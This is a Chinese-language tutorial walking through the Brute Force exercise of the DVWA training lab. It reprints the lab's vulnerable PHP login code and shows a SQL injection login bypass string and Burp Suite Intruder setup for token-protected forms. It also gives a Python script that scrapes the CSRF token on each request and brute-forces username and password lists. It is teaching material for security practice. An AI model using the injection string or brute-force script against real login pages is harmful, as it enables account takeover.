DVWA

Brute Force:暴力破解篇

  • 前言

    暴力破解是破解用户名密码的常用手段,主要是利用信息搜集得到有用信息来构造有针对性的弱口令字典,对网站进行爆破,以获取到用户的账号信息,有可能利用其权限进行一些非法操作。DVWA虽然是一个比较老的靶场,但其题目作为新手入门还是相当友好,大有裨益的,现有的网站添加了验证码、各种参数来阻止暴力破解,但验证码是可以被机器识别的,各种参数也是可以被构造的,只要掌握了其底层原理,我们依然可以使用该手段进行攻击。

Low级别

  • 代码
<?php

if( isset( $_GET[ 'Login' ] ) ) {

    // Get username

    $user = $_GET[ 'username' ];

    // Get password

    $pass = $_GET[ 'password' ];

    $pass = md5( $pass );

    // Check the database

    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

	//可以发现只要query语句能够查询到结果,就可以进入这个if成功登录

    if( $result && mysqli_num_rows( $result ) == 1 ) {

        // Get users details

        $row    = mysqli_fetch_assoc( $result );

        $avatar = $row["avatar"];

        // Login successful

        echo "<p>Welcome to the password protected area {$user}</p>";

        echo "<img src=\"{$avatar}\" />";

    }

    else {

        // Login failed

        echo "<pre><br />Username and/or password incorrect.</pre>";

    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);

}

?>

  • 方法一:万能密码

    虽然名为Brute Force,但第一题可以用SQL注入来做,并且非常简单。

    观察源代码,不难发现只要query语句能够查询到结果,就可以成功登录。于是构造语句如下,成功登录:

  • 关键代码解析

//这一句代码要求result语句能够查询到结果

if( $result && mysqli_num_rows( $result ) == 1 )

$query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

//我们将 admin' or '1'='1 注入到代码中之后,由于后台没有对其进行过滤,我们得到的query语句如下:

SELECT * FROM `users` WHERE user = 'admin' or '1'='1' AND password = '$pass';

//这样,该语句就被or分成了两个部分,由于第一部分一定能够查询到结果,后面的语句并不影响最终结果,所以我们无需在数据库中匹配到正确密码,只要用户名正确就可以成功注入

Medium级别

  • 代码
<?php

if( isset( $_GET[ 'Login' ] ) ) {

    // Sanitise username input

    $user = $_GET[ 'username' ];

    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input

    $pass = $_GET[ 'password' ];

    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    $pass = md5( $pass );

    // Check the database

    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {

        // Get users details

        $row    = mysqli_fetch_assoc( $result );

        $avatar = $row["avatar"];

        // Login successful

        echo "<p>Welcome to the password protected area {$user}</p>";

        echo "<img src=\"{$avatar}\" />";

    }

    else {

        // Login failed

        sleep( 2 );

        echo "<pre><br />Username and/or password incorrect.</pre>";

    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);

}

?>
  • 可以注意到,相比上一题,本题有以下特点:
  1. 登录失败会有sleep(2),有2秒的时延
  2. 后台使用mysqli_real_escape_string函数对输入进行了过滤,我们上菜鸟教程看下,可以知道这个函数是用来过滤某些特殊字符的,比如我们在上一题里用到的引号。

既然是暴力破解,我们这里用burpsuite来抓包做一下爆破,使用火狐浏览器来设置一下代理,在火狐设置选项中找到代理,其他浏览器也有相关插件或选项可以进行设置。然后给Burpsuite也设置一下代理,这里的火狐代理和burp代理需要是一样的,配置如下图。

PS:在这期间我遇到一个问题,burpsuite无法抓取本地数据包,于是我修改localhost为本机ip,因为localhost还会指向ipv6的域名,导致冲突,所以使用本机ipv4的ip就可以解决这一问题。





然后抓包,可以看到这里使用GET请求提交的用户名和密码参数,于是我们将抓取到的数据发送到Intruder,点击clear删除掉所有变量,然后光标选中密码对应值(这里是aaa),点击add将其设置为变量。





然后点击Payloads,输入破解用的密钥(如果有弱口令字典可以点load导入)。



PS:这里我又遇到一个问题,就是爆破之后返回状态码都为302重定向,如果有遇到这个问题的朋友,在Options最底下一项Redirection勾选always,就可以自动跟随重定向了。



然后点击右上角Start attack,可以看到payload为password一栏的length不一样,这就是我们想要的密码,第二题Over!

High级别

  • 代码
<?php

if( isset( $_GET[ 'Login' ] ) ) {

    // Check Anti-CSRF token

    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Sanitise username input

    $user = $_GET[ 'username' ];

    $user = stripslashes( $user );

    $user = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $user ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Sanitise password input

    $pass = $_GET[ 'password' ];

    $pass = stripslashes( $pass );

    $pass = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $pass ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    $pass = md5( $pass );

    // Check database

    $query  = "SELECT * FROM `users` WHERE user = '$user' AND password = '$pass';";

    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    if( $result && mysqli_num_rows( $result ) == 1 ) {

        // Get users details

        $row    = mysqli_fetch_assoc( $result );

        $avatar = $row["avatar"];

        // Login successful

        echo "<p>Welcome to the password protected area {$user}</p>";

        echo "<img src=\"{$avatar}\" />";

    }

    else {

        // Login failed

        sleep( rand( 0, 3 ) );

        echo "<pre><br />Username and/or password incorrect.</pre>";

    }

    ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);

}

// Generate Anti-CSRF token

generateSessionToken();

?>

相对上一题,本题主要多了这几个特点:

  1. 使用stripslashes函数对用户名和密码进行过滤

    stripslashes函数:用来去除字符串中的反斜杠,如果出现连续两个的反斜杠,则只去掉一个
  2. 对密码进行md5加密(但这对我们没有影响)
  3. 使用generateSessionToken函数加入了Token,可以抵御CSRF攻击,增加了爆破的难度

    generateSessionToken函数:用来生成token令牌,token值会不断变化,因此不能使用一般的爆破手段
  • 思路:这一题的难点在于token令牌,每次我们登陆时,页面会给我们返回一个token值,下次登陆时我们需要携带这个值让服务器来验证,这意味着我们多出了一个不可控的变量。

  • 方法一:Burpsuite抓包爆破

    我们依然可以选择使用burpsuite来对其进行爆破,只是流程比上一题复杂了一点。首先配置代理,和上面一样,抓包然后ctrl + i,send to Intruder,点击clear,然后选中password和token的值,点add设置为变量,把上面的Attack type攻击类型选项设置为Pitchfork(叉子模式)

    这里补充下Burpsuite的四种AttackType

    Attack Type 特点
    Sniper(狙击手) 对变量依次进行破解,多个标记依次进行。对每个爆破点使用相同字典进行爆破(类似单线程)
    Battering ram(工程锤) 对变量同时进行破解,多个标记同时进行。对多个爆破点使用相同字典同时进行爆破(类似多线程)
    Pitchfork(叉子) 对两个爆破点使用不同字典同时进行爆破
    Cluster Bomb(集束炸弹) 相当于二重循环,对每个第一个点的值,循环对第二个点进行爆破(例如对多个用户,循环对每个用户名使用相同密码字典进行爆破)

    那Token值要怎么捕获到呢?通过查看网页源代码,我们可以知道它在value这个位置,注意复制这个value,后面有用。



还是先到Options里选择一直跟随重定向,然后去Grep - Extract(通过正则提取信息的一个模块)里点击add找value的值,结果???有点问题。没事,我们要的值就在下面,直接鼠标选中就行了



然后到Payloads,先设置导入字典,然后在Payloads Set中设置Payloads Set为2,Payloads Type为Recursive grep递归查找,把token值放进去,Start Attack,成功!



  • 方法二:Python脚本爆破

注:代码虽然写了很详细的注释,但还是推荐有学过python爬虫的朋友看,没有学过的朋友看起来可能比较困难。

如果有朋友学过爬虫,那答案也非常简单。我们可以使用脚本来抓取每次生成的token,在下一次登录时携带该token进行爆破,这里我们使用Python来编写这个爆破脚本,使用时记得替换获取到的Cookie值。

import requests

from lxml import etree

from bs4 import BeautifulSoup

# 获取页面中的Token

def getToken(url, headers):

    # 得到HTML,并将其实例化为一个tree对象,利用xpath(类似选择器的原理)定位到token值所在位置并获取

    page_text = requests.get(url=url, headers=headers).text

    tree = etree.HTML(page_text)

    user_token = tree.xpath('//form/input[4]/@value')[0]

    print(user_token)

    return user_token

if __name__ == "__main__":

    # 设置参数进行UA伪装并携带Cookie

    headers = {

        'User-Agent':

        'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0',

        'Cookie': 'security=high; PHPSESSID=gqdal64o4bsbbgj0r9sg6r3lq0'

    }

    url = 'http://169.254.48.14/dvwa-master/vulnerabilities/brute/index.php'

    # 从文件中获取用户名和密码进行爆破(这里的爆破模式类似于Burp中的Cluster Bomb模式)

    count = 1

    with open('user.txt', 'r', encoding='utf-8') as userList:

        for admin in userList:

            with open('password.txt', 'r', encoding='utf-8') as pwdList:

                for line in pwdList:

                    username = admin.strip()

                    password = line.strip()

                    # 每次发送请求前获取token值,设置好get请求所需要的参数

                    user_token = getToken(url, headers)

                    payload = {

                        'username': username,

                        'password': password,

                        'Login': 'Login',

                        'user_token': user_token

                    }

                    response = requests.get(url=url, headers=headers, params=payload).content

                    # 整理下输出格式

                    print("{:<6}".format(count), "{:<15}".format(username), "{:<15}".format(password), len(response.decode()))

                    count += 1

结果如下,第4项字节长度与其他的不一致,即为管理员正确的用户密码。



感谢阅读,之后还会再更新DVWA的其他部分,感兴趣的朋友不妨点个关注。

DVWA Brute Force:暴力破解篇的更多相关文章

  1. 安全性测试入门:DVWA系列研究(一):Brute Force暴力破解攻击和防御

    写在篇头: 随着国内的互联网产业日臻成熟,软件质量的要求越来越高,对测试团队和测试工程师提出了种种新的挑战. 传统的行业现象是90%的测试工程师被堆积在基本的功能.系统.黑盒测试,但是随着软件测试整体 ...

  2. 【DVWA】Brute Force(暴力破解)通关教程

    日期:2019-08-01 14:49:47 更新: 作者:Bay0net 介绍:一直以为爆破很简单,直到学习了 Burp 的宏录制和匹配关键词,才发现 burp 能这么玩... 0x01. 漏洞介绍 ...

  3. DVWA之Brute Force(暴力破解)

    目录 Low Medium High Impossible 暴力破解是指使用穷举法,举出所有的可能的结果,然后逐一验证是否正确! Low 源代码: <?php if( isset( $_GET[ ...

  4. Brute Force(暴力(破解))

    一.攻击模块1:Brute Force(暴力破解) 暴力破解一般指穷举法,穷举法的基本思想是根据题目的部分条件确定答案的大致范围,并在此范围内对所有可能的情况逐一验证,直到全部情况验证完毕.若某个情况 ...

  5. Brute Force暴力破解

    Low 服务器只是验证了参数Login是否被设置,没有任何的防爆破机制,且对参数username.password没有做任何过滤,存在明显的sql注入漏洞. 方法一:bp爆破 直接对爆破密码得到pas ...

  6. DVWA靶场练习-暴力破解

    一.暴力破解 (Brute Force)    暴力破解是Web安全领域的一个基础技能,破解方法论为:构建常见用户名及弱口令 因此需要好的字典,对应破解场景构建特定的用户名密码,以及还需要具有灵活编写 ...

  7. 4. DVWA亲测暴力破解

    LOW等级 我们先用burpsuite抓包,因为burpsuite提供了暴力破解模块   我们先创建一个1.txt文件夹,把正确的账号密码写进去   我们输入 Username:1 Password: ...

  8. DVWA Brute Force 解析

    LOW 源代码如下: <?php if( isset( $_GET['Login'] ) ) { $user = $_GET['username']; $pass = $_GET['passwo ...

  9. DVWA之Brute Force教程

    ---恢复内容开始--- Brute Force暴力破解模块,是指黑客密码字典,使用穷举的方法猜出用户的口令,是一种广泛的攻击手法. LOW low级别的漏洞利用过程 1.使用burp suite工具 ...

随机推荐

  1. sqli-labs-master less05 前 知识点学习

    1. left()函数: left(a,b)从左侧截取a的前b位,正确则返回1,错误则返回0 例: select left(database(),1)='s'   结果返回1 先查询数据库 datab ...

  2. 新手上路之如何选择Java版本

    @ 目录 LTS与非LTS LTS 非LTS Java CPU与PSU Java SE.Java EE.Java ME的区别 Java SE Java EE Java ME 每一次JDK上新总有一群人 ...

  3. TensorFlow安装方法:附带坑解决办法

    >>添加Anaconda 仓库的镜像 Anaconda 安装包可以到 https://mirrors.tuna.tsinghua.edu.cn/anaconda/archive/ 下载. ...

  4. 将 python3 添加到环境变量(ubuntu)

    将 python3 添加到环境变量 echo alias python = python3 >> ~/.bashrc 更新环境变量 source ~/.bashrc

  5. rest-framework:频率控制

    一 频率简介: 为了控制用户对某个url请求的频率,比如,一分钟以内,只能访问三次 二 自定义频率类,自定义频率规则: 自定义的逻辑 #(1)取出访问者ip # (2)判断当前ip不在访问字典里,添加 ...

  6. (七)if/else就是goto

    一.CPU如何执行指令 CPU上有数以亿计的晶体管组层的复杂电路,我们先不用管具体电路如何实现:逻辑上我们可以认为CPU由许多寄存器组成,而这些寄存器又由许多锁存器和触发器组成,N个锁存器或触发器就可 ...

  7. 第4章 基础知识进阶 第4.1节 Python基础概念之迭代、可迭代对象、迭代器

    第四章 基础知识进阶第十七节 迭代.可迭代对象.迭代器 一.    引言 本来计划讲完元组和字典后就讲列表解析和字典解析,但要理解列表解析和字典解析,就需要掌握Python的高级的类型迭代器,因此本节 ...

  8. 第8.3节 Python类的__init__方法深入剖析:构造方法与继承详解

    第8.3节 Python类的__init__方法深入剖析:构造方法与继承详解 一.    引言 上两节介绍了构造方法的语法及参数,说明了构造方法是Python的类创建实例后首先执行的方法,并说明如果类 ...

  9. 快速理解Python中使用百分号占位符的字符串格式化方法中%s和%r的输出内容的区别

    <Python中使用百分号占位符的字符串格式化方法中%s和%r的输出内容有何不同?>老猿介绍了二者的区别,为了快速理解,老猿在此使用另外一种方式补充说明一下: 1.使用%r是调用objec ...

  10. 使用PyQt(Python+Qt)+moviepy开发的视频截取、音视频分离、MP4转GIF动图工具免费下载分享

    专栏:Python基础教程目录 专栏:使用PyQt开发图形界面Python应用 专栏:PyQt入门学习 老猿Python博文目录 在因博文素材需要将软件操作制作成动画时,发现网上相关绿色使用工具都需要 ...